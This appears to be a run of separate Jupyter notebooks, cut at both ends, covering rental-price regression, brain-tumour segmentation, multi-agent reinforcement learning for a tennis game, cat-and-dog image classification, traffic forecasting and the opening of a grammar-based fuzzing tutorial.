from sklearn.ensemble import RandomForestRegressor
def model_stat(y_test, y_pred):
print(' MAE:', mean_absolute_error(y_test, y_pred), '\n', 'MSE:',
mean_squared_error(y_test, y_pred), '\n', 'RMSE:',
np.sqrt(mean_squared_error(y_test, y_pred)), '\n', 'r2:',
r2_score(y_test, y_pred))
rf_reg = RandomForestRegressor(n_estimators=200,
criterion='mae',
n_jobs=-1)
rf_reg.fit(X_train_pr, y_train)
y_pred_rf = rf_reg.predict(X_test_pr)
model_stat(y_test, y_pred_rf)
```
### 4.GridSearch
```
# Number of trees in random forest
n_estimators = [int(x) for x in np.linspace(start = 200, stop = 1000, num = 5)]
# Number of features to consider at every split
max_features = ['auto', 'sqrt']
# # Maximum number of levels in tree
# max_depth = [int(x) for x in np.linspace(10, 60, num = 6)]
# max_depth.append(None)
# Minimum number of samples required to split a node
min_samples_split = [2, 5, 10]
# Minimum number of samples required at each leaf node
min_samples_leaf = [1, 2, 4]
# Method of selecting samples for training each tree
bootstrap = [True, False]
# oob_score=[True, False]
# Create the random grid
random_grid = {'n_estimators': n_estimators,
'max_features': max_features,
# 'max_depth': max_depth,
'min_samples_split': min_samples_split,
'min_samples_leaf': min_samples_leaf,
# 'bootstrap': bootstrap,
# 'oob_score': oob_score
}
print(random_grid)
from sklearn.model_selection import RandomizedSearchCV
# Use the random grid to search for best hyperparameters
# First create the base model to tune
rf = RandomForestRegressor(criterion='mae')
# Random search of parameters, using 3 fold cross validation,
# search across 100 different combinations, and use all available cores
rf_random = RandomizedSearchCV(estimator=rf,
param_distributions=random_grid,
n_iter=50,
cv=2,
verbose=2,
scoring ='neg_mean_absolute_error',
random_state=42,
n_jobs=-1)
# Fit the random search model
rf_random.fit(X_train_pr, y_train)
print(rf_random.best_params_)
```
### 5.Best parameters with RandomForestRegressor
```
rf_reg = RandomForestRegressor(n_estimators=1000,
criterion='mae',
min_samples_split=2,
min_samples_leaf=1,
max_features='sqrt',
max_depth=20,
bootstrap=False,
# oob_score=True,
n_jobs=-1)
rf_reg.fit(X_train_pr, y_train)
y_pred_rf = rf_reg.predict(X_test_pr)
model_stat(y_test, y_pred_rf)
sns.scatterplot(x=y_test, y=y_pred_rf)
sns.scatterplot(x=y_test, y=y_test)
rf_feat_imp = pd.DataFrame(rf_reg.feature_importances_, index=X_train_pr.columns)
rf_feat_imp.sort_values(by=0).plot(kind='barh', legend='', figsize=(10,15), title='Feature Importance', color = 'g')
plt.ylabel('Features')
plt.xlabel('Importance')
plt.show()
#SHAP (SHapley Additive exPlanations) is a game theoretic approach to explain the output of any machine learning model. It connects optimal credit allocation with local explanations using the classic Shapley values from game theory and their related extensions
import shap
shap.initjs()
explainer = shap.TreeExplainer(rf_reg)
shap_values = explainer.shap_values(X_test_pr)
with plt.style.context('seaborn-white'):
shap.summary_plot(shap_values, X_test_pr)
```
### 6.XGBRegressor
```
from xgboost import XGBRegressor, XGBRFRegressor
xgb_reg = XGBRegressor(learning_rate=0.1,
n_estimators=100,
# min_samples_split=2,
# min_samples_leaf=1,
# max_depth=3,
n_jobs=-1,
# subsample=1.0,
verbosity =1,
booster='gbtree',# gbtree, gblinear or dart
objective ='reg:squarederror',
random_state=2021)
xgb_reg.fit(X_train_pr, y_train)
y_pred_xgb = xgb_reg.predict(X_test_pr)
model_stat(y_test, y_pred_xgb)
```
### 7.SupportVectorMachine
```
from sklearn.svm import SVR
regressor = SVR(kernel = 'linear', C=1)
regressor.fit(X_train_pr, y_train)
y_pred_svr = regressor.predict(X_test_pr)
model_stat(y_test, y_pred_svr)
```
# 5.INTERPRETING THE DATA
### Best Model
### Among all the models tested, the "random forest model" produces the best results and has the smallest mean absolute error.
# CONCLUSION
#### 1. The location of your property does have an impact on rental income.
#### 2. In the short run, location is the most important factor in determining rental pricing.
#### 3. Condo owners might anticipate a boost in rental income.
#### 4. If your property is closer to the city's center, you can charge more.
# FUTURE WORK
#### 1. To assess quality, add demographic information to the model, such as area attractions, restaurants, income level, local transportation, year built information, or refurbishment information.
#### 2. Tweaking of hyperparameters
#### 3. Add Features of the house.
<a href="https://colab.research.google.com/github/alirezash97/BraTS/blob/master/results.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
```
# !wget https://www.cbica.upenn.edu/MICCAI_BraTS2020_ValidationData
# from google.colab import drive
# drive.mount('/content/drive')
# !unzip /content/MICCAI_BraTS2020_ValidationData -d '/content/drive/My Drive/BraTS2020 validation/'
# from google.colab import drive
# drive.mount('/content/drive')
import os
import numpy as np
from nibabel.testing import data_path
import nibabel as nib
import matplotlib.pyplot as plt
from keras.utils import to_categorical
import cv2
import keras
import random
from keras import backend as K
def soft_dice_loss(y_true, y_pred, axis=(1, 2, 3), epsilon=0.00001):
    dice_numerator = 2. * K.sum(y_true * y_pred, axis=axis) + epsilon
    dice_denominator = K.sum(y_true**2, axis=axis) + K.sum(y_pred**2, axis=axis) + epsilon
    return 1 - K.mean(dice_numerator / dice_denominator)

def dice_coefficient(y_true, y_pred, axis=(1, 2, 3), epsilon=0.00001):
    dice_numerator = 2. * K.sum(y_true * y_pred, axis=axis) + epsilon
    dice_denominator = K.sum(y_true, axis=axis) + K.sum(y_pred, axis=axis) + epsilon
    return K.mean(dice_numerator / dice_denominator)
# load and evaluate a saved model
from numpy import loadtxt
from keras.models import load_model
# load model
model = load_model('/content/drive/My Drive/BRATS2020/tenth_FlowerModel_update.01-0.06.h5', custom_objects={'soft_dice_loss':soft_dice_loss, 'dice_coefficient':dice_coefficient})
# summarize model.
model.summary()
# load dataset
import glob, os
images_path = glob.glob('/content/drive/My Drive/BraTS2020 validation/**/*.nii.gz', recursive=True)
data_path = ""
X_trainset_filenames = []
y_trainset_filenames = []
for item in images_path:
    if 'seg' in item:
        y_trainset_filenames.append(os.path.join(data_path, item))
    else:
        X_trainset_filenames.append(os.path.join(data_path, item))
print(len(X_trainset_filenames))
for i in range(300, 304):
    print(X_trainset_filenames[i])
def load_case(image_nifty_file, label_nifty_file):
    # load the four modality files and the label file, returning a numpy array for each
    image = np.zeros((240, 240, 155, 4))
    for channel in range(4):
        image[:, :, :, channel] = np.array(nib.load(image_nifty_file[channel]).get_fdata())
    label = np.array(nib.load(label_nifty_file).get_fdata())
    return image, label

def load_case_validation(image_nifty_file):
    # same as load_case, but the validation set ships without segmentation labels
    image = np.zeros((240, 240, 155, 4))
    for channel in range(4):
        image[:, :, :, channel] = np.array(nib.load(image_nifty_file[channel]).get_fdata())
    return image
def sort_by_channel(sample_path):
    # reorder each group of four modality paths as t1, t1ce, t2, flair
    n = int(len(sample_path) / 4)
    new_path = []
    for i in range(n):
        temp = sample_path[(i * 4):(i + 1) * 4]
        for tag in ('_t1.', '_t1ce.', '_t2.', '_flair.'):
            for path in temp:
                if tag in path:
                    new_path.append(path)
    return new_path
X_trainset_filenames_by_channels = sort_by_channel(X_trainset_filenames[412:416])
# image , label = load_case(X_trainset_filenames_by_channels, y_trainset_filenames)
image = load_case_validation(X_trainset_filenames_by_channels)
print(image.shape)
# print(label.shape)
def get_sub_volume(image, label):
    sub_volume_X = []
    sub_volume_y = []
    sub_volume_X_middle = []
    for z in range(8, 147, 16):
        # note: the original slices used z::z+16 (start z, step z+16), which is
        # almost certainly a typo for the depth window z:z+16 used elsewhere
        sub_middle_0 = image[60:180, :120, z:z+16, :]
        sub_middle_1 = image[60:180, 120:, z:z+16, :]
        for j in range(0, 240, 120):
            for k in range(0, 240, 120):
                sub_volume_X.append(image[j:j+120, k:k+120, z:z+16, :])
                sub_volume_y.append(label[j:j+120, k:k+120, z:z+16])
        sub_volume_X_middle.append(sub_middle_0)
        sub_volume_X_middle.append(sub_middle_1)
    return sub_volume_X, sub_volume_y, sub_volume_X_middle
def get_sub_volume_validation(image):
    sub_volume_X = []
    sub_volume_X_middle = []
    for z in range(8, 147, 16):
        sub_middle_0 = image[:120, 60:180, z:z+16, :]
        sub_middle_1 = image[120:, 60:180, z:z+16, :]
        for j in range(0, 240, 120):
            for k in range(0, 240, 120):
                sub_volume_X.append(image[j:j+120, k:k+120, z:z+16, :])
        sub_volume_X_middle.append(sub_middle_0)
        sub_volume_X_middle.append(sub_middle_1)
    return sub_volume_X, sub_volume_X_middle
# X, y = get_sub_volume(image, label)
X, X_middle = get_sub_volume_validation(image)
print(len(X))
print(len(X_middle))
# print(len(y))
print(X[1].shape)
print(X_middle[10].shape)
# print(y[1].shape)
from tqdm import tqdm

y_pred = []
for item in tqdm(X):
    temp_0 = item.reshape((1, 120, 120, 16, 4))
    y_pred.append(model.predict(temp_0))

y_pred_middle = []
for item in tqdm(X_middle):
    temp_0 = item.reshape((1, 120, 120, 16, 4))
    y_pred_middle.append(model.predict(temp_0))
y_pred_middle[0].shape
def get_whole_image(predict, predict_middle):
    # stitch the quadrant tiles back together, then blend in the overlapping middle tiles
    prediction = np.zeros((240, 240, 155, 3))
    counter = 0
    counter_middle = 0
    for z in range(8, 147, 16):
        for j in range(0, 240, 120):
            for k in range(0, 240, 120):
                prediction[j:j+120, k:k+120, z:z+16, :] = predict[counter]
                counter += 1
        middle_temp_0 = np.reshape(predict_middle[counter_middle], (120, 120, 16, 3))
        prediction[:120, 60:120, z:z+16, :] += middle_temp_0[:, :60, :, :]
        prediction[:120, 120:180, z:z+16, :] += middle_temp_0[:, 60:, :, :]
        middle_temp_1 = np.reshape(predict_middle[counter_middle + 1], (120, 120, 16, 3))
        prediction[120:, 60:120, z:z+16, :] += middle_temp_1[:, :60, :, :]
        prediction[120:, 120:180, z:z+16, :] += middle_temp_1[:, 60:, :, :]
        counter_middle += 2
    return prediction
y = get_whole_image(y_pred, y_pred_middle)
print(y.shape)
# from ipywidgets import interact
# def explore_3dimage(layer):
# plt.figure(figsize=(10, 5))
# channel = 3
# tt = X_middle[12]
# plt.imshow(tt[:, :, layer, 3]);
# plt.title('Explore Layers of MR image', fontsize=20)
# plt.axis('off')
# return layer
# # Run the ipywidgets interact() function to explore the data
# interact(explore_3dimage, layer=(0, 16 - 1));
from ipywidgets import interact

def explore_3dimage(layer):
    plt.figure(figsize=(10, 5))
    plt.imshow(image[:, :, layer, 1])
    plt.title('Explore Layers of MR image', fontsize=20)
    plt.axis('off')
    return layer

# Run the ipywidgets interact() function to explore the data
interact(explore_3dimage, layer=(0, 155 - 1));
from ipywidgets import interact

def explore_3dimage(layer):
    plt.figure(figsize=(10, 5))
    plt.imshow((y[:, :, layer, :] * 255).astype(np.uint8))
    plt.title('Explore Layers of Tumor prediction', fontsize=20)
    plt.axis('off')
    return layer

# Run the ipywidgets interact() function to explore the data
interact(explore_3dimage, layer=(0, 155 - 1));
# from ipywidgets import interact
# def explore_3dimage(layer):
# plt.figure(figsize=(10, 5))
# channel = 3
# plt.imshow(label[:, :, layer]);
# plt.title('Explore Layers of Tumor ground truth', fontsize=20)
# plt.axis('off')
# return layer
# # Run the ipywidgets interact() function to explore the data
# interact(explore_3dimage, layer=(0, 155 - 1));
```
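The sub-volume tiling used by `get_sub_volume` and `get_sub_volume_validation` above is easy to sanity-check in isolation: nine depth slabs times a 2×2 grid of 120×120 patches yields 36 quadrant tiles per 240×240×155 volume, and the top and bottom few slices fall outside the tiling. A small self-contained check:

```python
# Depth offsets used by the sub-volume functions above.
z_starts = list(range(8, 147, 16))                 # 8, 24, ..., 136 -> 9 slabs
tiles_per_slab = 4                                  # the 2x2 grid of 120x120 patches
n_quadrant_tiles = len(z_starts) * tiles_per_slab   # 36 tiles per volume

covered = set()
for z in z_starts:
    covered.update(range(z, z + 16))
# slices 8..151 are tiled; slices 0..7 and 152..154 are never covered,
# so the stitched prediction stays zero there
```

This also explains the `len(X)` printout earlier in the notebook: 36 quadrant tiles (plus 18 "middle" tiles, two per depth slab, used to smooth the patch seams).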
# Collaboration and Competition
### 1. Start the Environment
```
from unityagents import UnityEnvironment
import numpy as np
```
**_Before running the code cell below_**, change the `file_name` parameter to match the location of the Unity environment that you downloaded.
- **Mac**: `"path/to/Tennis.app"`
- **Windows** (x86): `"path/to/Tennis_Windows_x86/Tennis.exe"`
- **Windows** (x86_64): `"path/to/Tennis_Windows_x86_64/Tennis.exe"`
- **Linux** (x86): `"path/to/Tennis_Linux/Tennis.x86"`
- **Linux** (x86_64): `"path/to/Tennis_Linux/Tennis.x86_64"`
- **Linux** (x86, headless): `"path/to/Tennis_Linux_NoVis/Tennis.x86"`
- **Linux** (x86_64, headless): `"path/to/Tennis_Linux_NoVis/Tennis.x86_64"`
For instance, if you are using a Mac, then you downloaded `Tennis.app`. If this file is in the same folder as the notebook, then the line below should appear as follows:
```
env = UnityEnvironment(file_name="Tennis.app")
```
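The platform-to-path mapping above can be captured in a small helper. This is a hypothetical sketch — the `tennis_env_path` name is an assumption, and it assumes the default download layout relative to the notebook:

```python
def tennis_env_path(system, is_64bit=True, headless=False):
    """Map platform info to the Unity Tennis binary paths listed above
    (hypothetical helper; assumes the default download layout)."""
    if system == "Darwin":                        # macOS
        return "Tennis.app"
    if system == "Windows":
        arch = "x86_64" if is_64bit else "x86"
        return f"Tennis_Windows_{arch}/Tennis.exe"
    folder = "Tennis_Linux_NoVis" if headless else "Tennis_Linux"
    binary = "Tennis.x86_64" if is_64bit else "Tennis.x86"
    return f"{folder}/{binary}"
```

In practice you could call it with `platform.system()` and a 64-bit check, e.g. `UnityEnvironment(file_name=tennis_env_path(platform.system()))`.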
```
env = UnityEnvironment(file_name="./Tennis_Windows_x86_64/Tennis.exe")
```
Environments contain **_brains_** which are responsible for deciding the actions of their associated agents. Here we check for the first brain available, and set it as the default brain we will be controlling from Python.
```
# get the default brain
brain_name = env.brain_names[0]
brain = env.brains[brain_name]
```
### 2. Examine the State and Action Spaces
In this environment, two agents control rackets to bounce a ball over a net. If an agent hits the ball over the net, it receives a reward of +0.1. If an agent lets a ball hit the ground or hits the ball out of bounds, it receives a reward of -0.01. Thus, the goal of each agent is to keep the ball in play.
The observation space consists of 8 variables corresponding to the position and velocity of the ball and racket. Two continuous actions are available, corresponding to movement toward (or away from) the net, and jumping.
Run the code cell below to print some information about the environment.
```
# reset the environment
env_info = env.reset(train_mode=True)[brain_name]
# number of agents
num_agents = len(env_info.agents)
print('Number of agents:', num_agents)
# size of each action
action_size = brain.vector_action_space_size
print('Size of each action:', action_size)
# examine the state space
states = env_info.vector_observations
state_size = states.shape[1]
print('There are {} agents. Each observes a state with length: {}'.format(states.shape[0], state_size))
print('The state for the first agent looks like:', states[0])
```
### 3. Take Random Actions in the Environment
The cell below shows how to use the Python API to control the agents and receive feedback from the environment. Once this cell is executed, you will watch the agents' performance as they select actions at random at each time step. A window should pop up that allows you to observe the agents.
```
# for i in range(1, 6): # play game for 5 episodes
# env_info = env.reset(train_mode=False)[brain_name] # reset the environment
# states = env_info.vector_observations # get the current state (for each agent)
# scores = np.zeros(num_agents) # initialize the score (for each agent)
# while True:
# actions = np.random.randn(num_agents, action_size) # select an action (for each agent)
# actions = np.clip(actions, -1, 1) # all actions between -1 and 1
# print('actions',actions )
# env_info = env.step(actions)[brain_name] # send all actions to tne environment
# next_states = env_info.vector_observations # get next state (for each agent)
# rewards = env_info.rewards # get reward (for each agent)
# dones = env_info.local_done # see if episode finished
# scores += env_info.rewards # update the score (for each agent)
# states = next_states # roll over states to next time step
# print('states',next_states )
# print('rewards',rewards )
# print('dones',dones )
# if np.any(dones): # exit loop if episode finished
# break
# print('Score (max over agents) from episode {}: {}'.format(i, np.max(scores)))
```
When finished, you can close the environment.
```
# env.close()
```
### 4. Training The Agents
```
from collections import deque
from itertools import count
import torch
import time
import matplotlib.pyplot as plt
from ddpg_agent import DDPGAgent
from ddpg_network import Actor, Critic
from multi_agent_ddpg import MADDPG
random_seed=5
meta_agent = MADDPG(num_agents=num_agents,state_size=state_size, action_size=action_size,random_seed=random_seed)
def train_maddpg(n_episodes=10000, max_t=1000):
    avg_score = 0.0
    scores = []                          # list containing scores from each episode
    scores_window = deque(maxlen=100)
    for i_episode in range(1, n_episodes + 1):
        env_info = env.reset(train_mode=True)[brain_name]
        meta_agent.reset_agents()
        states = env_info.vector_observations
        score = np.zeros(num_agents)
        for t in range(max_t):
            actions = meta_agent.act(states, add_noise=True)
            # take the action and observe reward and next state
            env_info = env.step(actions)[brain_name]     # send the actions to the environment
            next_states = env_info.vector_observations   # get the next states
            rewards = env_info.rewards                   # get the rewards
            dones = env_info.local_done                  # see if the episode has finished
            # store the experience tuple (s, a, r, s') in replay memory and learn from a minibatch
            meta_agent.step(states, actions, rewards, next_states, dones, i_episode)
            states = next_states
            score += rewards
            if np.any(dones):
                break
        scores_window.append(np.max(score))  # episode score is the max over the agents
        scores.append(score)                 # save most recent score
        avg_score = np.mean(scores_window)
        print('\rEpisode {}\tAverage Score: {:.2f}'.format(i_episode, avg_score), end="")
        if i_episode % 100 == 0:
            print('\nEpisode {}\tAverage Score: {:.2f}'.format(i_episode, avg_score), end="")
            meta_agent.save_checkpoint()
        if avg_score > 0.5:
            print('\nEpisode {}\tAverage Score: {:.2f}'.format(i_episode, avg_score), end="")
            print('Environment solved!')
            meta_agent.save_checkpoint()
            return scores, avg_score
    return scores, avg_score
%%time
scores,avg_score = train_maddpg(10000,2000)
env.close()
#Save scores
np.save('MADDPG_scores.npy', np.array(scores))
# scores = np.load('MADDPG_scores.npy')
scores=np.asarray(scores)
plt.figure(figsize=(12,6))
plt.rc('font', size=20) # controls default text sizes
plt.rc('axes', titlesize=20) # fontsize of the axes title
plt.rc('axes', labelsize=20) # fontsize of the x and y labels
plt.rc('xtick', labelsize=20) # fontsize of the tick labels
plt.rc('ytick', labelsize=20) # fontsize of the tick labels
plt.rc('legend', fontsize=20) # legend fontsize
plt.rc('figure', titlesize=20) # fontsize of the figure title
plt.plot(scores[:,0],'b.')
plt.plot(scores[:,1],'r')
plt.plot(np.amax(scores,axis=1),'k')
plt.grid()
plt.xlabel('Episode')
plt.ylabel('Score')
plt.title('MADDPG')
plt.show()
```
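The stopping rule inside `train_maddpg` (the mean of the max-over-agents episode scores across a 100-episode window must exceed +0.5) can be isolated into a small, testable helper. A hedged sketch of that criterion:

```python
from collections import deque

def is_solved(episode_scores, window=100, threshold=0.5):
    """Solve check matching the criterion used above: the mean of the
    max-over-agents episode scores across the last `window` episodes
    must exceed `threshold` (+0.5 for the Tennis environment)."""
    recent = deque(episode_scores, maxlen=window)
    if not recent:
        return False
    return sum(recent) / len(recent) > threshold
```

Using a `deque(maxlen=window)` mirrors the `scores_window` in the training loop: old episodes drop out automatically, so the check always reflects the most recent 100 episodes.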
```
import os
from tensorflow.keras import layers
from tensorflow.keras import Model
!wget --no-check-certificate \
https://storage.googleapis.com/mledu-datasets/inception_v3_weights_tf_dim_ordering_tf_kernels_notop.h5 \
-O /tmp/inception_v3_weights_tf_dim_ordering_tf_kernels_notop.h5
from tensorflow.keras.applications.inception_v3 import InceptionV3
local_weights_file = '/tmp/inception_v3_weights_tf_dim_ordering_tf_kernels_notop.h5'
pre_trained_model = InceptionV3(input_shape = (150, 150, 3),
include_top = False,
weights = None)
pre_trained_model.load_weights(local_weights_file)
for layer in pre_trained_model.layers:
    layer.trainable = False
# pre_trained_model.summary()
last_layer = pre_trained_model.get_layer('mixed7')
print('last layer output shape: ', last_layer.output_shape)
last_output = last_layer.output
# pre_trained_model.summary()
from tensorflow.keras.optimizers import RMSprop
# Flatten the output layer to 1 dimension
x = layers.Flatten()(last_output)
# Add a fully connected layer with 1,024 hidden units and ReLU activation
x = layers.Dense(1024, activation='relu')(x)
# Add a dropout rate of 0.2
x = layers.Dropout(0.2)(x)
# Add a final sigmoid layer for classification
x = layers.Dense(1, activation='sigmoid')(x)
model = Model( pre_trained_model.input, x)
model.compile(optimizer = RMSprop(lr=0.0001),
loss = 'binary_crossentropy',
metrics = ['acc'])
# model.summary()
!wget --no-check-certificate \
https://storage.googleapis.com/mledu-datasets/cats_and_dogs_filtered.zip \
-O /tmp/cats_and_dogs_filtered.zip
from tensorflow.keras.preprocessing.image import ImageDataGenerator
import os
import zipfile
local_zip = '/tmp/cats_and_dogs_filtered.zip'
zip_ref = zipfile.ZipFile(local_zip, 'r')
zip_ref.extractall('/tmp')
zip_ref.close()
# Define our example directories and files
base_dir = '/tmp/cats_and_dogs_filtered'
train_dir = os.path.join( base_dir, 'train')
validation_dir = os.path.join( base_dir, 'validation')
train_cats_dir = os.path.join(train_dir, 'cats') # Directory with our training cat pictures
train_dogs_dir = os.path.join(train_dir, 'dogs') # Directory with our training dog pictures
validation_cats_dir = os.path.join(validation_dir, 'cats') # Directory with our validation cat pictures
validation_dogs_dir = os.path.join(validation_dir, 'dogs')# Directory with our validation dog pictures
train_cat_fnames = os.listdir(train_cats_dir)
train_dog_fnames = os.listdir(train_dogs_dir)
# Add our data-augmentation parameters to ImageDataGenerator
train_datagen = ImageDataGenerator(rescale = 1./255.,
rotation_range = 40,
width_shift_range = 0.2,
height_shift_range = 0.2,
shear_range = 0.2,
zoom_range = 0.2,
horizontal_flip = True)
# Note that the validation data should not be augmented!
test_datagen = ImageDataGenerator( rescale = 1.0/255. )
# Flow training images in batches of 20 using train_datagen generator
train_generator = train_datagen.flow_from_directory(train_dir,
batch_size = 20,
class_mode = 'binary',
target_size = (150, 150))
# Flow validation images in batches of 20 using test_datagen generator
validation_generator = test_datagen.flow_from_directory( validation_dir,
batch_size = 20,
class_mode = 'binary',
target_size = (150, 150))
history = model.fit_generator(
train_generator,
validation_data = validation_generator,
steps_per_epoch = 100,
epochs = 20,
validation_steps = 50,
verbose = 2)
import matplotlib.pyplot as plt
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(len(acc))
plt.plot(epochs, acc, 'r', label='Training accuracy')
plt.plot(epochs, val_acc, 'b', label='Validation accuracy')
plt.title('Training and validation accuracy')
plt.legend(loc=0)
plt.figure()
plt.show()
```
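The generator settings above fit together arithmetically: the `cats_and_dogs_filtered` dataset ships with 2,000 training and 1,000 validation images, so with `batch_size = 20`, `steps_per_epoch = 100` and `validation_steps = 50` each cover their split exactly once per epoch. A quick check:

```python
# Dataset sizes for cats_and_dogs_filtered: 2,000 training and 1,000 validation images.
train_images, val_images, batch_size = 2000, 1000, 20
steps_per_epoch = train_images // batch_size      # one full pass over the training set
validation_steps = val_images // batch_size       # one full pass over the validation set
```

If you change the batch size, recompute these two values; otherwise `fit_generator` either repeats or skips part of the data within an epoch.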
# McKinsey Analytics Online Hackathon
### Imports
```
import pandas as pd
import numpy as np
from fbprophet import Prophet
import matplotlib.pyplot as plt
%matplotlib inline
plt.rcParams['figure.figsize']=(20,10)
plt.style.use('ggplot')
```
### Data Loading and Handling
```
df_train = pd.read_csv('train_aWnotuB.csv', index_col='DateTime', parse_dates=True)
j1_train=df_train[df_train['Junction']==1]
j2_train=df_train[df_train['Junction']==2]
j3_train=df_train[df_train['Junction']==3]
j4_train=df_train[df_train['Junction']==4]
j1_train.drop(['Junction','ID'],1,inplace=True)
j2_train.drop(['Junction','ID'],1,inplace=True)
j3_train.drop(['Junction','ID'],1,inplace=True)
j4_train.drop(['Junction','ID'],1,inplace=True)
```
### Junction 1
```
df = j1_train.reset_index()
df=df.rename(columns={'DateTime':'ds', 'Vehicles':'y'})
df['y'] = np.log(df['y'])
model = Prophet(yearly_seasonality=True)
model.add_seasonality(name='monthly', period=30.5, fourier_order=5)
model.fit(df);
future = model.make_future_dataframe(periods=2952,freq='H')
forecast = model.predict(future)
df.set_index('ds', inplace=True)
forecast.set_index('ds', inplace=True)
viz_df_j1 = j1_train.join(forecast[['yhat', 'yhat_lower','yhat_upper']], how = 'outer')
viz_df_j1['yhat_rescaled'] = np.exp(viz_df_j1['yhat'])
junction1=viz_df_j1[-2952:]
junction1['Vehicles'] = junction1['yhat_rescaled']
junction1.drop(['yhat','yhat_lower','yhat_upper','yhat_rescaled'],1,inplace=True)
```
### Junction 2
```
df = j2_train.reset_index()
df=df.rename(columns={'DateTime':'ds', 'Vehicles':'y'})
df['y'] = np.log(df['y'])
model = Prophet(yearly_seasonality=True)
model.add_seasonality(name='monthly', period=30.5, fourier_order=5)
model.fit(df);
future = model.make_future_dataframe(periods=2952,freq='H')
forecast = model.predict(future)
df.set_index('ds', inplace=True)
forecast.set_index('ds', inplace=True)
viz_df_j2 = j2_train.join(forecast[['yhat', 'yhat_lower','yhat_upper']], how = 'outer')
viz_df_j2['yhat_rescaled'] = np.exp(viz_df_j2['yhat'])
junction2=viz_df_j2[-2952:]
junction2['Vehicles'] = junction2['yhat_rescaled']
junction2.drop(['yhat','yhat_lower','yhat_upper','yhat_rescaled'],1,inplace=True)
```
### Junction 3
```
df = j3_train.reset_index()
df=df.rename(columns={'DateTime':'ds', 'Vehicles':'y'})
df['y'] = np.log(df['y'])
df['cap'] = 6
model = Prophet(growth='logistic')
model.add_seasonality(name='monthly', period=30.5, fourier_order=5)
model.fit(df);
future = model.make_future_dataframe(periods=2952,freq='H')
future['cap'] = 6
forecast = model.predict(future)
df.set_index('ds', inplace=True)
forecast.set_index('ds', inplace=True)
viz_df_j3 = j3_train.join(forecast[['yhat', 'yhat_lower','yhat_upper']], how = 'outer')
viz_df_j3['yhat_rescaled'] = np.exp(viz_df_j3['yhat'])
junction3=viz_df_j3[-2952:]
junction3['Vehicles'] = junction3['yhat_rescaled']
junction3.drop(['yhat','yhat_lower','yhat_upper','yhat_rescaled'],1,inplace=True)
```
### Junction 4
```
df = j4_train.reset_index()
df=df.rename(columns={'DateTime':'ds', 'Vehicles':'y'})
df['y'] = np.log(df['y'])
df['cap'] = 4
model = Prophet(growth='logistic')
model.add_seasonality(name='monthly', period=30.5, fourier_order=5)
model.fit(df);
future = model.make_future_dataframe(periods=2952,freq='H')
future['cap'] = 4
forecast = model.predict(future)
df.set_index('ds', inplace=True)
forecast.set_index('ds', inplace=True)
viz_df_j4 = j4_train.join(forecast[['yhat', 'yhat_lower','yhat_upper']], how = 'outer')
viz_df_j4['yhat_rescaled'] = np.exp(viz_df_j4['yhat'])
junction4=viz_df_j4[-2952:]
junction4['Vehicles'] = junction4['yhat_rescaled']
junction4.drop(['yhat','yhat_lower','yhat_upper','yhat_rescaled'],1,inplace=True)
```
### Solution File
```
junction1['Junction']=1
junction2['Junction']=2
junction3['Junction']=3
junction4['Junction']=4
junction1['DateTime']=junction1.index
junction1=junction1[['DateTime','Junction','Vehicles']]
junction1.reset_index(drop=True,inplace=True)
junction2['DateTime']=junction2.index
junction2=junction2[['DateTime','Junction','Vehicles']]
junction2.reset_index(drop=True,inplace=True)
junction3['DateTime']=junction3.index
junction3=junction3[['DateTime','Junction','Vehicles']]
junction3.reset_index(drop=True,inplace=True)
junction4['DateTime']=junction4.index
junction4=junction4[['DateTime','Junction','Vehicles']]
junction4.reset_index(drop=True,inplace=True)
final_forecast=junction1.append(junction2,ignore_index=True)
final_forecast=final_forecast.append(junction3,ignore_index=True)
final_forecast=final_forecast.append(junction4,ignore_index=True)
test=pd.read_csv('test_BdBKkAj.csv')
test['Vehicles']=final_forecast['Vehicles']
test.to_csv('final_forecast.csv')
```
# Mutations with Grammars
In this notebook, we make a very short and simple introduction on how to use the `fuzzingbook` framework for grammar-based mutation – both for data and for code.
**Prerequisites**
* This chapter is meant to be self-contained.
## Defining Grammars
We define a grammar using standard Python data structures. Suppose we want to encode this grammar:
```
<start> ::= <expr>
<expr> ::= <term> + <expr> | <term> - <expr> | <term>
<term> ::= <factor> * <term> | <factor> / <term> | <factor>
<factor> ::= +<factor> | -<factor> | (<expr>) | <integer> | <integer>.<integer>
<integer> ::= <digit><integer> | <digit>
<digit> ::= 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9
```
```
import fuzzingbook_utils
from Grammars import syntax_diagram, is_valid_grammar, convert_ebnf_grammar, srange, crange
```
In Python, we encode this as a mapping (a dictionary) from nonterminal symbols to a list of possible expansions:
```
EXPR_GRAMMAR = {
"<start>":
["<expr>"],
"<expr>":
["<term> + <expr>", "<term> - <expr>", "<term>"],
"<term>":
["<factor> * <term>", "<factor> / <term>", "<factor>"],
"<factor>":
["+<factor>",
"-<factor>",
"(<expr>)",
"<integer>.<integer>",
"<integer>"],
"<integer>":
["<digit><integer>", "<digit>"],
"<digit>":
["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]
}
assert is_valid_grammar(EXPR_GRAMMAR)
syntax_diagram(EXPR_GRAMMAR)
```
## Fuzzing with Grammars
We mostly use grammars for _fuzzing_, as in here:
```
from GrammarFuzzer import GrammarFuzzer
expr_fuzzer = GrammarFuzzer(EXPR_GRAMMAR)
for i in range(10):
print(expr_fuzzer.fuzz())
```
## Parsing with Grammars
We can parse a given input using a grammar:
```
expr_input = "2 + -2"
from Parser import EarleyParser, display_tree, tree_to_string
expr_parser = EarleyParser(EXPR_GRAMMAR)
expr_tree = list(expr_parser.parse(expr_input))[0]
display_tree(expr_tree)
```
Internally, each subtree is a pair of a node and a list of children (subtrees):
```
expr_tree
```
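As a standalone sketch of this pair representation (independent of the fuzzingbook modules), here is a hand-built derivation tree for the input `2` together with a minimal `unparse` helper. Both are hypothetical illustrations: the real trees use the grammar's nonterminals, and terminal leaves carry an empty child list.

```python
# Each node is (symbol, children); terminal symbols carry an empty child list.
tree = ("<start>",
        [("<expr>",
          [("<term>",
            [("<factor>",
              [("<integer>",
                [("<digit>", [("2", [])])])])])])])

def unparse(tree):
    """Concatenate all terminal symbols of a derivation tree."""
    symbol, children = tree
    if not children:           # a terminal: emit it verbatim
        return symbol
    return ''.join(unparse(c) for c in children)

unparse(tree)   # -> '2'
```

This is essentially what `tree_to_string` does: a depth-first traversal that keeps only the leaves.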
## Mutating a Tree
We define a simple mutator that traverses an AST to mutate it.
```
def swap_plus_minus(tree):
node, children = tree
